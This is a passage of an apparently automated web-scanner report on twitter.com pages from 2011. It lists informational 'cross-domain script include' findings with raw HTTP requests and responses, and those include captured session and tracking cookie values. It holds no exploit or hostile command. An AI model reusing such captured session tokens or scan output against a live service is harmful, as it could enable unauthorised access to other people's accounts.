Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.273. http://twitter.com/VirginiaBeachWk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/VirginiaBeachWk

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /VirginiaBeachWk HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:27:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664037-85927-22875
ETag: "304068dea8ffedd3412810b7dc74b0e5"
Last-Modified: Wed, 02 Feb 2011 16:27:17 GMT
X-Runtime: 0.00935
Content-Type: text/html; charset=utf-8
Content-Length: 43738
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.274. http://twitter.com/VirginiaBeachWk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/VirginiaBeachWk

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /VirginiaBeachWk HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570770-54034-26380
ETag: "722e5a4a17a930dc410ddfa2dcfcf29f"
Last-Modified: Tue, 01 Feb 2011 14:32:50 GMT
X-Runtime: 0.00929
Content-Type: text/html; charset=utf-8
Content-Length: 43757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570767721275; path=/; expires=Tue, 08-Feb-11 14:32:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657077046596591; path=/; expires=Thu, 03 Mar 2011 14:32:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmMzhmYWYzMjhjZDBhZmU3MGI3NGUzMzViZjgwOGYwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIIuSj4S0B--feaf2307ccc3ef42a4424cc41ad061fc85bcfc4c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.275. http://twitter.com/Wyome655 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Wyome655

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560
http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560
http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Wyome655 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570771-49392-27110
ETag: "8920930d7ac5f22d9c28d638bc510a43"
Last-Modified: Tue, 01 Feb 2011 14:32:52 GMT
X-Runtime: 0.01365
Content-Type: text/html; charset=utf-8
Content-Length: 49043
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570769541250; path=/; expires=Tue, 08-Feb-11 14:32:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657077200155260; path=/; expires=Thu, 03 Mar 2011 14:32:52 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTlhODFlYTZmZDMyOTVmOGEzNjU1YWQyOGVkYzU1NTdkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsII%252Bqj4S0B--3dc2a7877e1c46c038d07097aebde48d6ed83ef5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560" type="text/javascript"></script>
...[SNIP]...

18.276. http://twitter.com/Wyome655 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Wyome655

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Wyome655 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664081-82824-14723
ETag: "01cc93e233b3fd99fa7110c40225ab9d"
Last-Modified: Wed, 02 Feb 2011 16:28:01 GMT
X-Runtime: 0.01158
Content-Type: text/html; charset=utf-8
Content-Length: 49047
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.277. http://twitter.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664299-65427-40066
ETag: "f4b03e36f332887b6be3e85bba9db2a4"
Last-Modified: Wed, 02 Feb 2011 16:31:39 GMT
X-Runtime: 0.02816
Content-Type: text/html; charset=utf-8
Content-Length: 15164
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.278. http://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664304-22258-7338
ETag: "7937f6327935ef26bdd7e378484a4133"
Last-Modified: Wed, 02 Feb 2011 16:31:44 GMT
X-Runtime: 0.04159
Content-Type: text/html; charset=utf-8
Content-Length: 10974
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.279. http://twitter.com/about/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664305-37407-21351
ETag: "740ffc42e7c4a26dc6815a086c969aa9"
Last-Modified: Wed, 02 Feb 2011 16:31:45 GMT
X-Runtime: 0.01849
Content-Type: text/html; charset=utf-8
Content-Length: 12673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.280. http://twitter.com/account/complete previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/complete

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664210-37197-19050
ETag: "5a850aa02a131e333e2ae658632b2e39"
Last-Modified: Wed, 02 Feb 2011 16:30:10 GMT
X-Runtime: 0.03116
Content-Type: text/html; charset=utf-8
